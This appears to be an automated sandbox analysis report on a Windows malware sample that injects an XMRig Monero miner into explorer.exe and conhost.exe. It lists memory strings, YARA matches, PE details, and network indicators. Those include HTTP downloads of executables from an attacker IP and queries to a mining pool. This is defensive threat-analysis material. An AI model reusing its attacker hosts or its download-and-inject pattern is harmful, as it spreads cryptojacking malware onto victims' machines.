                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                  Source: AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                  Source: AppLaunch.exe, 00000001.00000002.735196227.0000000007124000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, conhost.exe, 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmpString found in binary or memory: https://xmrig.com/wizard%s
                  Source: unknownDNS traffic detected: queries for: mine.bmpool.org
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp | String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                  Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  PE file has nameless sections
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCE8
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCE1
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCF7
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCCE
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCBF
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD6C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD4D
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD5C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD34
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_0564EC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569FA96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569B6F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569DFC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569DFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097FD2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F64F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F6E57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F6EA0
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CE2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CDF06
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CEB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CD2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CE70E
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA36265E22
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA36265076
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA3626044A
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218DF06
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218E2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218EB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218E70E
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218D2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36250330
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA362567BC
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36255E22
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36255076
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4E2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4DF06
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4D2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4E70E
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4EB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA362666FD
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36265E22
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36265076
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA3626044A
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36268BBE
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
